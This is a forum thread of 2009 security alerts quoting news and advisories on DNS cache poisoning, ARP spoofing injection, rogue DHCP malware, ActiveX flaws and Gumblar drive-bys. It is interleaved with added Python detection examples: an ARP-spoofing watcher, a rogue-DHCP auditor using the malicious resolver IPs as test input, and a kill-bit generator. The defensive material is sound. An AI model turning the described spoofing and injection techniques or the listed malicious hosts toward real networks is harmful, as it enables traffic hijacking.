Old Alerts

Google broken... maybe back up now?

FYI...

- http://isc.sans.org/diary.html?storyid=5779
Last Updated: 2009-01-31 18:17:26 UTC - "... it appears to be reporting that every site might contain malware (i.e. it shows the "This site may harm your computer" warning with every result)...UPDATE X3: Google's response*..."

Google: This Internet May Harm Your Computer
- http://voices.washingtonpost.com/securityfix/2009/01/google_this_internet_will_harm.html
January 31, 2009 - "A glitch in a computer security program embedded deeply into Google's search engine briefly prevented users of the popular search engine from visiting any Web sites turned up in search results this morning. Instead, Google users were redirected to a page that warned: "This site may harm your computer"..."
* http://googleblog.blogspot.com/2009/01/this-site-may-harm-your-computer-on.html
January 31, 2009 - "...the URL of '/' was mistakenly checked in as a value to the file and '/' expands to all URLs. Fortunately, our on-call site reliability team found the problem quickly and reverted the file. Since we push these updates in a staggered and rolling fashion, the errors began appearing between 6:27 a.m. and 6:40 a.m. and began disappearing between 7:10 and 7:25 a.m., so the duration of the problem for any particular user was approximately 40 minutes..."
- http://blog.stopbadware.org/2009/01/31/google-glitch-causes-confusion
January 31, 2009 - "...Users who attempted to click through the results saw the "interstitial" warning page that mentions the possibility of badware and refers people to StopBadware.org for more information. This led to a denial of service of our website, as millions of Google users attempted to visit our site for more information... [Update 2:35] Hopefully this will be the last update, as Google has acknowledged the error, apologized to its customers, and fixed the problem. As many know, we have a strong relationship with Google, which is a sponsor and partner of StopBadware.org. The mistake in Google’s initial statement, indicating that we supply them with badware data, is a common misperception. We appreciate their follow up efforts in clarifying the relationship on their blog and with the media. Despite today’s glitch, we continue to support Google’s effort to proactively warn users of badware sites, and our experience is that they are committed to doing so as accurately and as fairly as possible..."

:spider::lip::red:
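The Google post-mortem above boils down to a single catch-all entry ("/") reaching a prefix-matching list. The following is an added illustration in Python, not Google's code: the list format (entries are "host/path", and a host-less entry is a path prefix applied to every host), the canary URLs and the rejection threshold are all assumptions. The point it shows is the pre-push check that would have caught the bad entry: run each new entry against a set of URLs that must never be flagged and refuse the update if any entry matches them.

```python
from urllib.parse import urlsplit

# Constructed canary set: URLs that a valid list must never flag.
CANARY_URLS = [
    "http://www.example.org/",
    "https://docs.example.net/guide/index.html",
    "http://news.example.com/2009/01/31/story",
    "http://shop.example.co.uk/cart",
]


def split_entry(entry):
    """Split a list entry into (host, path_prefix).

    Entries look like "host/path". An entry with no host (it starts with
    "/") is a path pattern applied to every host, which is how a bare "/"
    ends up covering every URL. This entry format is an assumption."""
    if entry.startswith("/"):
        return None, entry
    host, _, path = entry.partition("/")
    return host.lower(), "/" + path


def entry_matches(entry, url):
    """True if the list entry covers the URL (host equal, path by prefix)."""
    host, prefix = split_entry(entry)
    parts = urlsplit(url)
    path = parts.path or "/"
    if host is not None and (parts.hostname or "").lower() != host:
        return False
    return path.startswith(prefix)


class HarmfulSiteList:
    """Prefix-matching blocklist of the kind that drives an interstitial warning."""

    def __init__(self, entries):
        self.entries = list(entries)

    def is_flagged(self, url):
        return any(entry_matches(e, url) for e in self.entries)


def validate_update(entries, canaries=CANARY_URLS, max_fraction=0.0):
    """Pre-push sanity check: return the entries that flag more than
    max_fraction of the canary URLs. A catch-all such as "/" flags all of
    them and must be rejected before the rolling push starts."""
    offending = []
    for entry in entries:
        hits = sum(entry_matches(entry, u) for u in canaries)
        if hits / len(canaries) > max_fraction:
            offending.append(entry)
    return offending


if __name__ == "__main__":
    update = ["badsite.example/", "evil.example/downloads/", "/"]
    rejected = validate_update(update)
    print("rejected entries:", rejected)
    live = HarmfulSiteList([e for e in update if e not in rejected])
    print("canary still clean:", not live.is_flagged("http://www.example.org/"))
```

The threshold is zero here because a blocklist entry should never cover a canary at all; a real deployment would also reject an update whose total match rate against a sample of recent search results jumps far above the previous version's.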
 
DNS spoofing vuln...

FYI...

- http://preview.tinyurl.com/cjkx72
February 20, 2009 (Computerworld) - "...nearly one-third of the estimated 200,000 DNS servers worldwide still remain unprotected against the cache-poisoning threat and need to be patched as soon as possible, Kaminsky said, adding that many of them are being attacked on a daily basis. "We are seeing attacks where people are redirecting major sites to places where they shouldn't be going," he said. "It's happening right now." The cache-poisoning flaw was publicly disclosed last July... The flaw could be used by attackers to spoof DNS traffic, potentially enabling them to redirect Web traffic and e-mail messages to systems under their control..."

Web-based DNS Randomness Test
- https://www.dns-oarc.net/oarc/services/dnsentropy
Test My DNS

...and if you are still having problems, try this:
- http://www.opendns.com/

.
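The DNS-OARC page linked above tests a resolver by inducing it to send queries and looking at how random the source ports and transaction IDs are. The block below is an added example in Python of that analysis over captured samples; it is not DNS-OARC's code and its thresholds and verdict labels are illustrative assumptions. The two sample sets are constructed, not real captures: one models an unpatched resolver (one fixed source port, counting TXID), the other a patched one.

```python
import math
import random
from collections import Counter


def shannon_bits(values):
    """Empirical Shannon entropy, in bits, of a list of observed values."""
    n = len(values)
    counts = Counter(values)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def sequential_fraction(values, modulus=65536):
    """Fraction of consecutive samples that step by exactly +1: the
    signature of an incrementing counter rather than a random draw."""
    if len(values) < 2:
        return 0.0
    steps = sum(1 for a, b in zip(values, values[1:]) if (b - a) % modulus == 1)
    return steps / (len(values) - 1)


def assess_resolver(samples):
    """samples: (source_port, txid) pairs seen from one resolver, e.g. at an
    authoritative server it was induced to query. Returns the measurements
    plus a verdict; the thresholds are illustrative assumptions."""
    ports = [p for p, _ in samples]
    txids = [t for _, t in samples]
    report = {
        "queries": len(samples),
        "distinct_ports": len(set(ports)),
        "port_bits": round(shannon_bits(ports), 2),
        "txid_bits": round(shannon_bits(txids), 2),
        "port_sequential": round(sequential_fraction(ports), 2),
        "txid_sequential": round(sequential_fraction(txids), 2),
    }
    # Before the 2008 patches many resolvers used one fixed source port, so an
    # attacker only had to hit the 16-bit TXID. A patched resolver randomises
    # both, leaving close to 2^32 combinations to guess per outstanding query.
    poor = (report["distinct_ports"] <= 1
            or report["port_sequential"] > 0.5
            or report["txid_sequential"] > 0.5)
    report["verdict"] = "POOR" if poor else "GOOD"
    return report


# Constructed samples, not real captures.
UNPATCHED = [(32768, 0x1000 + i) for i in range(50)]   # fixed port, counting TXID
_rng = random.Random(2009)
PATCHED = [(_rng.randrange(1024, 65536), _rng.randrange(65536)) for _ in range(50)]

if __name__ == "__main__":
    for name, samples in (("unpatched", UNPATCHED), ("patched", PATCHED)):
        print(name, assess_resolver(samples))
```

Feed it real pairs from a packet capture of your resolver's outbound queries (source port and DNS ID of each packet to UDP/53) and the same two measures apply; a resolver behind a NAT that rewrites source ports sequentially will also score POOR, which is a real weakness, not a false alarm.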
 
IBM server bug [Seagate/SATA drives] could cause Data Loss

FYI...

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=215600307
March 2, 2009 - "IBM said a recent firmware update could cause the Seagate disk drives on more than two dozen models of its business servers to fail, leading to a situation that could cause customers to lose access to critical corporate data. In a current support bulletin*, the company said the bug affects a range of models in its BladeCenter, xSeries, and System x lines of servers. "After a power cycle, the SATA drive is no longer available and becomes unresponsive," IBM warned. "Data may become inaccessible due to the drive not responding," according to the bulletin, which lists numerous IBM server configurations at risk from the problem. IBM said customers should use the ServeRAID manager or other tools to determine their disk drive model and firmware. IBM said it plans to fix the problem in a firmware update "scheduled for first quarter 2009." The company did not offer further specifics on a release date. The update, when available, will be accessible as a download from IBM's System x support Web site... IBM said the warning applies to server products sold worldwide."
* http://preview.tinyurl.com/c8fy3l
Last modified: 2009-02-18

:fear::sad::fear:
 
Massive ARP spoofing attacks on websites

FYI...

- http://isc.sans.org/diary.html?storyid=6001
Last Updated: 2009-03-11 00:34:49 UTC - "...attackers used ARP spoofing to inject malicious JavaScript into content served off other web sites. The biggest problem with such attacks is that it can be very difficult to analyze them unless you remember to check layer two network traffic. Such attacks are very covert and put in danger all web sites in the same subnet...
ARP spoofing attacks happen on layer two – the Address Resolution Protocol maps IP addresses and MAC addresses, which is what is used to communicate in local subnets... The basic idea of an ARP spoofing attack is for the attacker to spoof IP address <-> MAC address pair of the default gateway. This allows him to intercept (and, if needed, modify) all outgoing traffic from that subnet. The attacker can also spoof the IP address <-> MAC address pair of a local server in which case he could monitor incoming traffic, but in this scenario that was not necessary. The spoofing attack consists of the attacker sending ARP packets containing fake data to the target. In normal conditions the target machine will accept this and “believe” whatever the attacker is saying...
A server on a local subnet was compromised and the attacker installed ARP spoofing malware (together with keyloggers and other Trojans) on the machine. The ARP spoofing malware poisoned local subnet so the outgoing traffic was tunneled through it. The same malware then inserted malicious JavaScript into every HTML page served by any server on that subnet. You can see how this is fruitful for the attacker – with one compromised server they can effectively attack hundreds of web sites...
AV detection rates were similarly poor (in the meantime they improved). Particularly nasty was the Winlogon Notify hook package which simply “sniffs” all usernames/passwords of users logging in to the system (so password changes don’t help)..."

(More detail at the ISC URL above.)

> http://en.wikipedia.org/wiki/ARP_spoofing

:fear::fear:
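The diary's advice is to remember layer two. As an added example (Python, not from the ISC diary or any tool it names), the block below parses raw ARP replies and flags the two things a gateway-spoofing attack cannot avoid: the gateway's IP suddenly resolving to a different MAC, and one MAC claiming more than one IP. The packets are constructed with a small builder so the example runs offline; the MACs, IPs and gateway address are made up.

```python
import struct

ARP_FMT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Raw ARP reply body (what follows the Ethernet header). Used only to
    construct the sample capture below; nothing is sent."""
    return struct.pack(ARP_FMT, 1, 0x0800, 6, 4, ARP_REPLY,
                       mac_bytes(sender_mac), ip_bytes(sender_ip),
                       mac_bytes(target_mac), ip_bytes(target_ip))


def parse_arp(pkt):
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(ARP_FMT, pkt[:28])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    return {"op": oper, "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


class ArpWatch:
    """Learns IP<->MAC bindings from ARP replies and alerts on changes."""

    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.ip_to_mac = {}
        self.mac_to_ips = {}
        self.alerts = []

    def observe(self, pkt):
        a = parse_arp(pkt)
        if a["op"] != ARP_REPLY:
            return []
        new = []
        ip, mac = a["spa"], a["sha"]
        known = self.ip_to_mac.get(ip)
        if known is not None and known != mac:
            kind = "gateway_mac_changed" if ip == self.gateway_ip else "mac_changed"
            new.append({"kind": kind, "ip": ip, "old": known, "new": mac})
        self.ip_to_mac[ip] = mac          # keep the latest; flapping re-alerts
        ips = self.mac_to_ips.setdefault(mac, set())
        ips.add(ip)
        if len(ips) > 1:
            new.append({"kind": "mac_claims_multiple_ips", "mac": mac, "ips": sorted(ips)})
        self.alerts.extend(new)
        return new


# Constructed capture: real gateway answers, then a compromised server on the
# same subnet answers for itself, then it claims the gateway's IP.
GATEWAY_IP = "10.0.0.1"
CAPTURE = [
    build_arp_reply("00:11:22:33:44:01", GATEWAY_IP, "00:11:22:33:44:05", "10.0.0.5"),
    build_arp_reply("00:11:22:33:44:09", "10.0.0.9", "00:11:22:33:44:05", "10.0.0.5"),
    build_arp_reply("00:11:22:33:44:09", GATEWAY_IP, "00:11:22:33:44:05", "10.0.0.5"),
]


def run_capture(capture, gateway_ip=GATEWAY_IP):
    watch = ArpWatch(gateway_ip)
    for pkt in capture:
        watch.observe(pkt)
    return watch.alerts


if __name__ == "__main__":
    for alert in run_capture(CAPTURE):
        print(alert)
```

On a real host, feed `observe()` the ARP payloads from a capture (e.g. the bytes after the 14-byte Ethernet header of each frame with ethertype 0x0806). The "mac_claims_multiple_ips" signal is the one worth paging on: the attacker's NIC keeps its own IP while it also answers for the gateway, so the same MAC shows up bound to two addresses.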
 
New rogue-DHCP server malware

FYI...

- http://isc.sans.org/diary.html?storyid=6025
Last Updated: 2009-03-16 19:49:12 UTC - "...new version of rogue DHCP server malware... The malware appears to be similar to Trojan.Flush.M which was found last December. Like back then, after infecting its target, the malware installs a rogue DHCP server. The main goal of the DHCP server is to spread a bad DNS server IP address... summary of the differences:
• The new version sets the DHCP lease time to 1 hour.
• It sets the MAC destination to the broadcast address, rather than the MAC address of the DHCP client.
• It does not specify a DNS Domain Name.
• The options field does not contain an END option followed by PAD options.
• Unlike Trojan.Flush.M, the BootP Broadcast Bit is set.

The malicious DNS server is 64.86.133.51 and 63.243.173.162.
Recommendation: Monitor connections to DNS servers other than the approved one pushed out by your DHCP server. This should help you spot this kind of malware. Yes, you can block the two IP addresses listed above, but it will likely do little good."

:fear::fear:
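The diary's recommendation is to compare what clients are being handed against what your real DHCP server hands out. As an added example (Python, not from the ISC diary), the block below builds DHCPOFFER packets from the BOOTP layout, parses their options and audits an offer against an approved server and resolver list, using the differentiators the diary lists (the DNS servers, the one-hour lease, the missing domain name, the BootP broadcast bit). The two offers are constructed; the legitimate server, client and resolver addresses (192.0.2.x) and the lease threshold are assumptions, and the rogue resolver addresses are the two the diary gives.

```python
import struct
from ipaddress import ip_address

BOOTP_FMT = "!BBBBIHH4s4s4s4s16s64s128s"   # op .. file, 236 bytes
MAGIC = b"\x63\x82\x53\x63"
BOOTREPLY, DHCPOFFER, DHCPACK = 2, 2, 5
OPT_PAD, OPT_DNS, OPT_DOMAIN, OPT_LEASE, OPT_MSGTYPE, OPT_SERVER_ID, OPT_END = 0, 6, 15, 51, 53, 54, 255
FLAG_BROADCAST = 0x8000


def build_offer(xid, yiaddr, server_ip, dns_servers, lease_secs, broadcast=False, domain=None):
    """Constructed DHCPOFFER (BOOTP header + magic cookie + options); sample input only."""
    flags = FLAG_BROADCAST if broadcast else 0
    hdr = struct.pack(BOOTP_FMT, BOOTREPLY, 1, 6, 0, xid, 0, flags,
                      b"\0" * 4, ip_address(yiaddr).packed, ip_address(server_ip).packed,
                      b"\0" * 4, b"\0" * 16, b"\0" * 64, b"\0" * 128)
    opts = bytes([OPT_MSGTYPE, 1, DHCPOFFER])
    opts += bytes([OPT_SERVER_ID, 4]) + ip_address(server_ip).packed
    opts += bytes([OPT_LEASE, 4]) + struct.pack("!I", lease_secs)
    dns = b"".join(ip_address(d).packed for d in dns_servers)
    opts += bytes([OPT_DNS, len(dns)]) + dns
    if domain:
        opts += bytes([OPT_DOMAIN, len(domain)]) + domain.encode()
    return hdr + MAGIC + opts + bytes([OPT_END])


def parse_dhcp(pkt):
    """Return the header fields of interest plus a {option_code: raw_value} map."""
    f = struct.unpack(BOOTP_FMT, pkt[:236])
    if pkt[236:240] != MAGIC:
        raise ValueError("missing DHCP magic cookie")
    opts, i = {}, 240
    while i < len(pkt):
        code = pkt[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        length = pkt[i + 1]
        opts[code] = pkt[i + 2:i + 2 + length]
        i += 2 + length
    return {"op": f[0], "xid": f[4], "broadcast": bool(f[6] & FLAG_BROADCAST),
            "yiaddr": str(ip_address(f[8])), "options": opts}


def ip_list(raw):
    return [str(ip_address(raw[i:i + 4])) for i in range(0, len(raw), 4)]


def audit_offer(pkt, approved_servers, approved_dns, min_lease=6 * 3600):
    """Compare a captured OFFER/ACK with what the real server hands out.
    Returns a list of findings; an empty list means nothing looked odd."""
    d = parse_dhcp(pkt)
    o = d["options"]
    if o.get(OPT_MSGTYPE, b"\0")[0] not in (DHCPOFFER, DHCPACK):
        return []
    findings = []
    server_id = ip_list(o[OPT_SERVER_ID])[0] if OPT_SERVER_ID in o else "missing"
    if server_id not in approved_servers:
        findings.append(f"unapproved_server:{server_id}")
    for dns in ip_list(o.get(OPT_DNS, b"")):
        if dns not in approved_dns:
            findings.append(f"unapproved_dns:{dns}")
    if OPT_LEASE in o:
        lease = struct.unpack("!I", o[OPT_LEASE])[0]
        if lease < min_lease:
            findings.append(f"short_lease:{lease}")
    if OPT_DOMAIN not in o:
        findings.append("no_domain_name")
    if d["broadcast"]:   # weak signal on its own: the server copies it from the client
        findings.append("broadcast_bit_set")
    return findings


# Constructed offers: our real server, and a rogue one pushing the diary's resolvers.
APPROVED_SERVERS = {"192.0.2.1"}
APPROVED_DNS = {"192.0.2.53"}
LEGIT = build_offer(0x1234, "192.0.2.77", "192.0.2.1", ["192.0.2.53"], 86400, domain="corp.example")
ROGUE = build_offer(0x1234, "192.0.2.78", "192.0.2.200", ["64.86.133.51", "63.243.173.162"],
                    3600, broadcast=True)

if __name__ == "__main__":
    print("legit:", audit_offer(LEGIT, APPROVED_SERVERS, APPROVED_DNS))
    print("rogue:", audit_offer(ROGUE, APPROVED_SERVERS, APPROVED_DNS))
```

Any "unapproved_server" finding is the one that matters, since a rogue DHCP server on the segment is the root problem; the other findings only help recognise this particular family. Pair the audit with a flow check for UDP/53 traffic to anything other than the approved resolvers, which catches hosts that already took the bad lease.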
 
Lotus Notes & Symantec advisories - vuln "wp6sr.dll"

FYI...

- http://www.us-cert.gov/current/index.html#autonomy_keyview_sdk_vulnerability
March 18, 2009 - "US-CERT is aware of reports of a vulnerability that affects the Autonomy KeyView SDK wp6sr.dll library. This library is used by certain products, including Lotus Notes and Symantec, to support the handling of Word Perfect documents. By convincing a user to open a specially crafted Word Perfect document with an application using the affected Autonomy KeyView SDK library, a remote attacker may be able to execute arbitrary code...
• IBM Lotus Notes users should review the IBM Flash Alert and implement the listed fixes or workarounds.
http://www-01.ibm.com/support/docview.wss?uid=swg21377573
• Symantec users should review Symantec Security Advisory SYM09-004 and implement the listed fixes or workarounds.
http://www.symantec.com/avcenter/security/Content/2009.03.17a.html
• Registered Autonomy Users should review the related Autonomy alert (login required).
https://customers.autonomy.com/supp...SDK/10.4/kv_update_nti40_10.4.zip.readme.html ..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4564
Last revised: 03/20/2009
CVSS v2 Base Score: 9.3 (HIGH)

:fear:
 
Thunderbird v2.0.0.21 released

FYI...

- http://www.mozillamessaging.com/en-US/thunderbird/
March 18, 2009

Fixed in Thunderbird 2.0.0.21
- http://www.mozilla.org/security/known-vulnerabilities/thunderbird20.html#thunderbird2.0.0.21
MFSA 2009-10 Upgrade PNG library to fix memory safety hazards
MFSA 2009-09 XML data theft via RDFXMLDataSource and cross-domain redirect
MFSA 2009-07 Crashes with evidence of memory corruption (rv:1.9.0.7)
MFSA 2009-01 Crashes with evidence of memory corruption (rv:1.9.0.6)

- http://secunia.com/advisories/33802/2/
Last Update: 2009-03-20
Critical: Highly critical
Impact: Security Bypass, Exposure of sensitive information, DoS, System access
Where: From remote
Solution Status: Vendor Patch ...
Solution: Update to version 2.0.0.21...
CVE reference:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0040
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0352
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0353
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0772
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0774
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0776

:fear:
 
IBM ActiveX vuln...

FYI...

IBM Access Support ActiveX control stack buffer overflow
- http://www.kb.cert.org/vuls/id/340420
Date Last Updated: 2009-03-25 - "... IBM Access Support ActiveX control, which is provided by IbmEgath.dll, contains a stack buffer overflow in the GetXMLValue() method. We have confirmed that version 3.20.284.0 is vulnerable. Other versions may also contain the flaw.
... Impact: By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. The attacker could also cause Internet Explorer (or the program using the WebBrowser control) to crash.
... Solution: We are currently unaware of a practical solution to this problem. Please consider the following workarounds: Disable the IBM Access Support ActiveX control in Internet Explorer
The vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: {74FFE28D-2378-11D5-990C-006094235084} ..."

- http://secunia.com/advisories/34470/2/
Critical: Highly critical
Solution Status: Unpatched...

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0215
Last revised: 03/25/2009
CVSS v2 Base Score:9.3 (HIGH)...

:fear:
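The CERT workaround above is the kill bit: a Compatibility Flags DWORD of 0x400 under the control's CLSID in the ActiveX Compatibility key, after which Internet Explorer refuses to instantiate it. As an added example (Python, not CERT's or IBM's code), the block below generates a .reg file that sets that bit for one or more CLSIDs, validating the CLSID format, OR-ing the bit into any existing flags so other compatibility bits survive, and writing both the native and the Wow6432Node key so 32-bit IE on 64-bit Windows is covered too. The only CLSID used is the one from the advisory; the helper names are this example's own.

```python
import re

# Kill bit: Compatibility Flags 0x400 under HKLM\...\ActiveX Compatibility\{CLSID}.
KILL_BIT = 0x00000400
CLSID_RE = re.compile(r"^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$")
COMPAT_KEYS = [
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility",
    # 32-bit IE on 64-bit Windows reads the WOW64 view of the registry, so set both.
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility",
]


def normalize_clsid(clsid):
    """Upper-case, brace-wrapped CLSID, or ValueError if it is not one."""
    c = clsid.strip().upper()
    if not c.startswith("{"):
        c = "{" + c + "}"
    if not CLSID_RE.match(c):
        raise ValueError(f"not a CLSID: {clsid!r}")
    return c


def with_kill_bit(existing_flags):
    """OR the kill bit into whatever Compatibility Flags are already set."""
    return existing_flags | KILL_BIT


def has_kill_bit(flags):
    return bool(flags & KILL_BIT)


def killbit_reg(clsids, existing_flags=None):
    """Build the text of a .reg file (for `reg import`) that sets the kill bit
    for each CLSID. existing_flags: optional {clsid: current dword} read from
    the target machine beforehand, so other bits are preserved."""
    existing_flags = existing_flags or {}
    lines = ["Windows Registry Editor Version 5.00", ""]
    for raw in clsids:
        clsid = normalize_clsid(raw)
        flags = with_kill_bit(existing_flags.get(clsid, 0))
        for key in COMPAT_KEYS:
            lines.append(f"[{key}\\{clsid}]")
            lines.append(f'"Compatibility Flags"=dword:{flags:08x}')
            lines.append("")
    return "\r\n".join(lines)


if __name__ == "__main__":
    # CLSID of the IBM Access Support control from the CERT note above.
    print(killbit_reg(["{74FFE28D-2378-11D5-990C-006094235084}"]))
```

Write the output to a file and apply it with an elevated `reg import killbit.reg`; to confirm, `reg query` the key and check that bit 0x400 is set in Compatibility Flags. The kill bit is per-CLSID, so a vendor update that ships the control under a new CLSID is not covered by it.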
 
DNS providers under attack

FYI...

- http://isc.sans.org/diary.html?storyid=6121
Last Updated: 2009-04-03 21:35:44 UTC - "We've been keeping an eye on the issues affecting the domain servers of Register.com. Several readers have written to us with concerns over the lack of availability of Register.com's servers, which seem to have been under a DDoS attack. There are also reports that DNS provider NeuStar (UltraDNS) may be under DDoS, too. We don't have any information at the moment about these incidents, beyond what is reported in the following articles:
- http://www.theinquirer.net/inquirer/news/638/1051638/register-com-suffers-dos-attack
- http://www.scmagazineus.com/DDoS-attacks-hit-major-web-services/article/130060/
Register.com issues are causing lots of issues across the web. One reader told us, "We are struggling to keep our websites available. DNS is the problem. We are being told by Register.com that the April 1 issues are affecting them. It sounds like they are being DOS'd and are filtering certain ISPs from querying them." Another reader said, "Register.com's DNS servers have gone offline for the second time in 24 hours. They were down yesterday from about 15:45 - 18:45 and just went down again today at about 14:30 (all times EST)..."

- http://isc.sans.org/diary.html?storyid=6121
Last Updated: 2009-04-04 02:53:13 UTC ...(Version: 2)
"Update: ... We are using all available means to restore services to every one of our customers and halt this criminal attack on our business and our customers’ business. We are working round the clock to make that happen. We are committed to updating you in as timely manner as possible, please check your inbox or our website for additional updates.
Thank you for your patience.
Larry Kutscher
Chief Executive Officer
Register.com"

:fear::fear:
 
AT&T cables cut - Silicon Valley...

FYI...

- http://blog.wired.com/27bstroke6/2009/04/cable-sabotage.html
April 09, 2009 | 3:58:39 PM - "Deliberate sabotage is being blamed for a sizable internet and telephone service outage Thursday in Silicon Valley. At 1:30 a.m., someone opened a manhole cover on a railroad right-of-way in San Jose, climbed down and cut four AT&T fiber optic cables. A second AT&T cable, and a Sprint cable, were cut in the same manner two hours later, farther north in San Carlos. Service for Sprint, Verizon and AT&T customers in the southern San Francisco Bay Area has been lost, according to the San Francisco Chronicle*. Police departments have put more units on the street, because nobody can call 9-1-1. A much smaller Comcast outage affecting around 4,500 customers in San Jose began at around 1:00 p.m. Pacific time. Spokesman Andrew Johnson says the company is investigating the cause.
Update: AT&T is offering a $100,000 reward** for information leading to the arrest and conviction of the vandal."

* http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2009/04/09/BAP816VTE6.DTL&tsp=1
April 10, 2009 - "... Ten fiber-optic cables... were cut at four locations in the predawn darkness..."

AT&T Offering $100,000 Reward in Bay Area Network Vandalism
** http://www.att.com/gen/press-room?pid=4800&cdvn=news&newsarticleid=26715
April 9, 2009

:mad::mad::mad:
 
Sysinternals updates 3 apps

FYI... http://isc.sans.org/diary.html?storyid=6373

- http://technet.microsoft.com/sysinternals/bb963902.aspx
Autoruns v9.5: This update to Autoruns, a powerful autostart manager, adds display of audio and video codecs, which are gaining popularity as an extension mechanism used by malware to gain automatic execution.
- http://technet.microsoft.com/sysinternals/bb897544.aspx
PsLoglist v2.7: This version of PsLoglist, a command-line event log display utility, now properly displays event log entries for default event log sources on Windows Vista and higher and accepts wildcard matching for event sources.
- http://technet.microsoft.com/sysinternals/bb897553.aspx
PsExec v1.95: This version of PsExec, a utility for executing applications remotely, fixes an issue that prevented the -i (interactive) switch from working on Windows XP systems with a recent hotfix and includes a number of minor bug fixes.

May 08, 2009

:bigthumb:
 
Google buggy...

FYI...

- http://googleblog.blogspot.com/2009/05/this-is-your-pilot-speaking-now-about.html
5/14/2009 - "... An error in one of our systems caused us to direct some of our web traffic through Asia, which created a traffic jam. As a result, about 14% of our users experienced slow services or even interruptions. We've been working hard to make our services ultrafast and "always on," so it's especially embarrassing when a glitch like this one happens. We're very sorry that it happened, and you can be sure that we'll be working even harder to make sure that a similar problem won't happen again..."

- http://isc.sans.org/diary.html?storyid=6388
Last Updated: 2009-05-14 22:36:04 UTC ...(Version: -13-)

- http://asert.arbornetworks.com/2009/05/the-great-googlelapse/
May 14th, 2009 at 4:36 pm

:fear::spider::confused:
 
Google-focused Gumblar.cn mal-script website hijacks

FYI...

- http://preview.tinyurl.com/rbxxwa
May 14, 2009 PC World - "A new round of website hijacks is attempting to install malicious, Google-focused software on unpatched PCs, according to security company ScanSafe, further cementing the drive-by-download approach as a bad-guy tactic of choice. The attack, dubbed "Gumblar" by ScanSafe*, starts by hijacking legitimate sites and inserting attack code. The more than 1,500 hacked sites, including Tennis.com and Variety.com, don't represent an especially huge number, but it's growing rapidly. Since last week, the attack has grown by 80 percent, according to the company, and has spiked 188 percent since yesterday.
The inserted attack code attempts to identify old, unpatched vulnerabilities on a victim PC that browses a hacked site, and will take advantage of any discovered hole to install malware. These kinds of drive-by-download attacks are sneaky and dangerous, but the good news is that while the actual exploits used vary as time passes, the company says none have yet gone after zero-day holes that don't yet have a fix available. The attack code has largely gone after PDF and Flash flaws discovered in the last year..."
* http://blog.scansafe.com/journal/2009/5/14/gumblar-qa.html

- http://www.theregister.co.uk/2009/05/14/viral_web_infection/
14 May 2009 - "... The exploit code is unique for every website, making it impossible to identify a compromised site until someone has accidentally surfed there. It uses obfuscated Javascript that's burrowed deep into a website's source code to exploit unpatched vulnerabilities in a visitor's Adobe Flash and Reader programs. Victims then join a botnet that manipulates their Google search results... By injecting ads and links into certain searches, infected users see results that are different than they would otherwise be..."

- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=217500218
May 14, 2009 - "... difficult to find and bring down... its source IP addresses have been traced to Latvia and Russia, and its servers are located in the U.K..."

Gumblar .cn exploit
- http://preview.tinyurl.com/r5cplm
07 May 09 (Unmask Parasites blog)

More Facts about the Gumblar attack
- http://preview.tinyurl.com/qg5c8d
15 May 09 (Unmask Parasites blog)

Troj/JSRedir-R attacks
- http://www.sophos.com/blogs/sophoslabs/v/post/4422
May 14, 2009

http://google.com/safebrowsing/diagnostic?site=gumblar.cn/
"... Malicious software includes 24 scripting exploit(s), 6 trojan(s)... site has hosted malicious software over the past 90 days. It infected 12799 domain(s)..."

:fear::mad:
 
HP recalls 70,000 Notebook batteries due to Fire Hazard

FYI...

- http://www.cpsc.gov/cpscpub/prerel/prhtml09/09221.html
May 14, 2009 - "... recall of the following consumer product. Consumers should stop using recalled products immediately unless otherwise instructed.
Name of Product: Lithium-Ion batteries used in Hewlett-Packard and Compaq notebook computers
Units: About 70,000
Importer: Hewlett-Packard Co., of Palo Alto, Calif.
Hazard: The recalled lithium-ion batteries can overheat, posing a fire and burn hazard to consumers..."
(HP Pavilion, Compaq Presario, HP, HP Compaq - see link above for specific models)

- http://www.theinquirer.net/inquirer/news/1137353/hp-recalls-lithium-ion-batteries
15 May 2009 - "... Hewlett-Packard is voluntarily recalling about 70,000 lithium-ion batteries that shipped with several models of its HP and Compaq laptops. Nine models of HP Pavilions, nine models of Compaq Presarios, two HP laptop models, and one HP Compaq laptop model sold between August 2007 and March 2008 all shipped with the dodgy battery... HP said that owners of the affected laptop models should pull the battery out of the machine and give it a ring* so it can ship a free replacement."
* http://bpr.hpordercenter.com/hbpr/M14.aspx

:fear::fear:
 
Gumblar/JSRedir-R drive-bys...

More...

- http://isc.sans.org/diary.html?storyid=6403
